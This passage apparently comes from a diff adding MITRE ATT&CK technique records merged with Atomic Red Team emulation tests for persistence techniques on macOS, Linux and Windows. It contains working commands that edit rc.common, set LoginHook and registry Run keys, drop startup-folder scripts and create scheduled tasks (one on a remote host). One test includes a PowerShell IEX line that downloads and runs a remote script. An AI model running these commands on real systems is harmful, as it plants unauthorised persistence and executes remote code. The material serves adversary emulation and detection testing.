Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + + Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + + Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) + name: RC Scripts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.004 + url: https://attack.mitre.org/techniques/T1037/004 + - source_name: IranThreats Kittens Dec 2017 + url: https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/ + description: Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, + A Case of Ambiguity and Shared Code. Retrieved May 28, 2020. + - description: Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted + Linux Systems. Retrieved June 24, 2019. + url: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/ + source_name: Intezer HiddenWasp Map 2019 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: Apple Developer Doco Archive Launchd + url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (2016, September 13). Daemons and Services Programming + Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021. + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - source_name: Ubuntu Manpage systemd rc + url: http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html + description: Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility + generator for starting /etc/rc.local and /usr/sbin/halt.local during + boot and shutdown. Retrieved February 23, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:01.927Z' + created: '2020-01-15T16:25:22.260Z' + x_mitre_platforms: + - macOS + - Linux + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: "Monitor for unexpected changes to RC scripts in the /etc/ + directory. Monitor process execution resulting from RC scripts for unusual + or unknown applications or behavior.\n\nMonitor for /etc/rc.local + file creation. Although types of RC scripts vary for each Unix-like distribution, + several execute /etc/rc.local if present. " + x_mitre_permissions_required: + - root + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1037.004 + atomic_tests: + - name: rc.common + auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de + description: | + Modify rc.common + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + supported_platforms: + - macos + executor: + command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello + World"'' >> /etc/rc.common + +' + elevation_required: true + name: bash + T1547.007: + technique: + created: '2020-01-24T18:15:06.641Z' + modified: '2020-01-24T19:51:37.795Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e + description: "Adversaries may modify plist files to automatically run an application + when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain + applications to be re-opened when a user logs into their machine after reboot. + While this is usually done via a Graphical User Interface (GUI) on an app-by-app + basis, there are property list files (plist) that contain this information + as well located at ~/Library/Preferences/com.apple.loginwindow.plist + and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. + \n\nAn adversary can modify one of these files directly to include a link + to their malicious executable to provide a persistence mechanism each time + the user reboots their machine (Citation: Methods of Mac Malware Persistence)." + name: Re-opened Applications + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.007 + url: https://attack.mitre.org/techniques/T1547/007 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Modification' + - 'Command: Command Execution' + x_mitre_detection: Monitoring the specific plist files associated with reopening + applications can indicate when an application has registered itself to be + reopened. + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.007 + atomic_tests: + - name: Re-Opened Applications + auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba + description: | + Plist Method + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + executor: + steps: | + 1. create a custom plist: + + ~/Library/Preferences/com.apple.loginwindow.plist + + or + + ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist + name: manual + - name: Re-Opened Applications + auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + description: | + Mac Defaults + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + input_arguments: + script: + description: path to script + type: path + default: "/path/to/script" + executor: + command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} + +' + cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook + +' + elevation_required: true + name: sh + T1547.001: + technique: + id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 + description: |- + Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. + + The following run keys are created by default on Windows systems: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce + + Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) + + The following Registry keys can be used to set startup folder items for persistence: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + + The following Registry keys can control automatic startup of services during boot: + + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices + + Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + + The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. + + Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. + + By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. + + Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + name: Registry Run Keys / Startup Folder + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.001 + url: https://attack.mitre.org/techniques/T1547/001 + - external_id: CAPEC-270 + source_name: capec + url: https://capec.mitre.org/data/definitions/270.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - source_name: Microsoft Wow6432Node 2018 + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry + description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data + in the Registry. Retrieved August 3, 2020. + - source_name: Malwarebytes Wow6432Node 2016 + url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ + description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved + August 3, 2020. + - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key + description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry + Key. Retrieved June 29, 2018. + source_name: Microsoft RunOnceEx APR 2018 + - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ + description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden + from Autoruns.exe. Retrieved June 29, 2018. + source_name: Oddvar Moe RunOnceEx Mar 2018 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-06T18:36:29.226Z' + created: '2020-01-23T22:02:48.566Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_detection: |- + Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. + + Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.001 + atomic_tests: + - name: Reg Key Run + auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 + description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will + modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output + will be via stdout. \n" + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.exe + executor: + command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V + "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" + +' + cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + /V "Atomic Red Team" /f >nul 2>&1 + +' + name: command_prompt + - name: Reg Key RunOnce + auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb + description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe + will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will + be via stdout. \n" + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /d "#{thing_to_execute}" + +' + cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: PowerShell Registry RunOnce + auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 + description: | + RunOnce Key Persistence via PowerShell + Upon successful execution, a new entry will be added to the runonce item in the registry. + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: powershell.exe + reg_key_path: + description: Path to registry key to update + type: Path + default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce + executor: + command: | + $RunOnceKey = "#{reg_key_path}" + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" + -Force -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Suspicious vbs file run from startup Folder + auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + description: "vbs files can be placed in and ran from the startup folder to + maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will + be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious jse file run from startup Folder + auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 + description: "jse files can be placed in and ran from the startup folder to + maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will + be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious bat file run from startup Folder + auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e + description: | + bat files can be placed in and executed from the startup folder to maintain persistance. + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + folder and will also run when the computer is restarted and the user logs in. + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + description: 'Adds a non-malicious executable shortcut link to the current users + startup directory. Test can be verified by going to the users startup directory + and checking if the shortcut link exists. ' + supported_platforms: + - windows + executor: + command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation + = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell + = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath + = $Target\n$Create.Save() " + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start + Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1134.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.005 + url: https://attack.mitre.org/techniques/T1134/005 + - url: https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx + description: Microsoft. (n.d.). Security Identifiers. Retrieved November 30, + 2017. + source_name: Microsoft SID + - url: https://msdn.microsoft.com/library/ms679833.aspx + description: Microsoft. (n.d.). Active Directory Schema - SID-History attribute. + Retrieved November 30, 2017. + source_name: Microsoft SID-History Attribute + - url: https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems + description: Microsoft. (2017, June 23). Well-known security identifiers in + Windows operating systems. Retrieved November 30, 2017. + source_name: Microsoft Well Known SIDs Jun 2017 + - url: https://technet.microsoft.com/library/ee617241.aspx + description: Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved + November 30, 2017. + source_name: Microsoft Get-ADUser + - url: https://adsecurity.org/?p=1772 + description: 'Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence + #14: SID History. Retrieved November 30, 2017.' + source_name: AdSecurity SID History Sept 2015 + - url: https://msdn.microsoft.com/library/ms677982.aspx + description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November + 30, 2017. + source_name: Microsoft DsAddSidHistory + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SID-History Injection + description: |- + Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). + + With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006). + id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:49:58.414Z' + created: '2020-02-18T18:34:49.414Z' + x_mitre_contributors: + - Alain Homewood, Insomnia Security + - Vincent Le Toux + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory) + + Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory) + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1053.005: + technique: + created: '2019-11-27T14:58:00.429Z' + modified: '2020-12-30T14:26:44.730Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1053.005 + url: https://attack.mitre.org/techniques/T1053/005 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. + source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task + description: |- + Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. + + The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. + + An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). + id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1053.005 + atomic_tests: + - name: Scheduled Task Startup Script + auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 + description: | + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + the tasks, open the Task Scheduler and look in the Active Tasks pane. + supported_platforms: + - windows + executor: + command: | + schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" + schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" + cleanup_command: | + schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 + schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 + name: command_prompt + elevation_required: true + - name: Scheduled task Local + auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 + description: 'Upon successful execution, cmd.exe will create a scheduled task + to spawn cmd.exe at 20:10. + +' + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + executor: + name: command_prompt + elevation_required: false + command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 + +' + - name: Scheduled task Remote + auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + description: | + Create a task on a remote system. + + Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + target: + description: Target + type: String + default: localhost + user_name: + description: 'Username to authenticate with, format: DOMAIN\User' + type: String + default: DOMAIN\user + password: + description: Password to authenticate with + type: String + default: At0micStrong + executor: + name: command_prompt + elevation_required: true + command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN + "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /S 